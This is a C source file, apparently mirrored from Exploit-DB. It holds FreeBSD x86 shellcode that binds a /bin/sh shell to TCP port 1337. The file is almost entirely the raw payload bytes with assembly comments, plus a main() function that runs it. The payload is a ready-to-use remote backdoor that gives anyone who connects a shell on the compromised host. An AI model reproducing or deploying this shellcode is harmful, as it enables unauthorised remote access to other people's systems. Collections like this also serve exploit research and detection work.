exploit-db-mirror/shellcodes/freebsd_x86/13570.c

/*-
 * Copyright (c) 2009, Sofian Brabez <sbz@6dev.net>
 *
 * freebsd-x86-portbind.c - FreeBSD x86 portbind a shell (/bin/sh) on
1337 (\x05\x39) 167 bytes
 */

const char shellcode[] =
	"\x6a\x00" 					// push   $0x0
	"\x6a\x01" 					// push   $0x1
	"\x6a\x02" 					// push   $0x2
	"\x50" 						// push   %eax
	"\x6a\x61" 					// push   $0x61
	"\x58" 						// pop    %eax
	"\xcd\x80" 					// int    $0x80
	"\x50" 						// push   %eax
	"\x6a\x00" 					// push   $0x0
	"\x6a\x00" 					// push   $0x0
	"\x6a\x00" 					// push   $0x0
	"\x6a\x00" 					// push   $0x0
	"\x68\x10\x02\x05\x39" 		// push   $0x39050210
	"\x89\xe0" 					// mov    %esp,%eax
	"\x6a\x10" 					// push   $0x10
	"\x50" 						// push   %eax
	"\xff\x74\x24\x1c" 			// pushl  0x1c(%esp)
	"\x50" 						// push   %eax
	"\x6a\x68" 					// push   $0x68
	"\x58"						// pop    $eax
	"\xcd\x80" 					// int    $0x80
	"\x6a\x01"					// push   $0x1
	"\xff\x74\x24\x28"			// pushl  0x28(%esp)
	"\x50"						// push   %eax
	"\x6a\x6a"					// push   $0x6a
	"\x58"						// pop    $eax
	"\xcd\x80"					// int    $0x80
	"\x83\xec\x10"				// sub    $0x10,$esp
	"\x6a\x10"					// push   $0x10
	"\x8d\x44\x24\x04"         	// lea    0x4(%esp),%eax
	"\x89\xe1"					// mov    %esp,%ecx
	"\x51"						// push   %ecx
	"\x50"						// push   %eax
	"\xff\x74\x24\x4c"			// pushl  0x4c(%esp)
	"\x50"						// push   %eax
	"\x6a\x1e"					// push   %0x1e
	"\x58"						// pop    %eax
	"\xcd\x80"					// int    $0x80
	"\x50"						// push   %eax
	"\xff\x74\x24\x58"			// pushl  0x58(%esp)
	"\x50"						// push   %eax
	"\x6a\x06"					// push   $0x6
	"\x58"						// pop    %eax
	"\xcd\x80"					// int    $0x80
	"\x6a\x00"					// push   $0x0
	"\xff\x74\x24\x0c"			// pushl  0xc(%esp)
	"\x50"						// push   %eax
	"\x6a\x5a"					// push   $0x5a
	"\x58"						// pop    %eax
	"\xcd\x80"					// int    $0x80
	"\x6a\x01"					// push   $0x1
	"\xff\x74\x24\x18"			// pushl  0x18(%esp)
	"\x50"						// push   %eax
	"\x6a\x5a"					// push   $0x5a
	"\x58"						// pop    %eax
	"\xcd\x80"					// int    $0x80
	"\x6a\x02"					// push   $0x2
	"\xff\x74\x24\x24"			// pushl  0x24(%esp)
	"\x50"						// push   %eax
	"\x6a\x5a"					// push   $0x5a
	"\x58"						// pop    %eax
	"\xcd\x80"					// int    $0x80
	"\x68\x73\x68\x00\x00"		// push   $0x6873
	"\x89\xe0"					// mov    %esp,%eax
	"\x68\x2d\x69\x00\x00"		// push   $0x692d
	"\x89\xe1"					// mov    %esp,%ecx
	"\x6a\x00"					// push   $0x0
	"\x51"						// push   %ecx
	"\x50"						// push   %eax
	"\x68\x2f\x73\x68\x00"		// push   $0x68732f
	"\x68\x2f\x62\x69\x6e"		// push   $0x6e69622f
	"\x89\xe0"					// mov    %esp,%eax
	"\x8d\x4c\x24\x08"			// lea    0x8(%esp),%ecx
	"\x6a\x00"					// push   $0x0
	"\x51"						// push   %ecx
	"\x50"						// push   %eax
	"\x50"						// push   %eax
	"\x6a\x3b"					// push   $0x3b
	"\x58"						// pop    %eax
	"\xcd\x80";					// int    $0x80

int main(void) {
    void (*egg)() = (void *)shellcode;

    return (*(int(*)())shellcode)();
}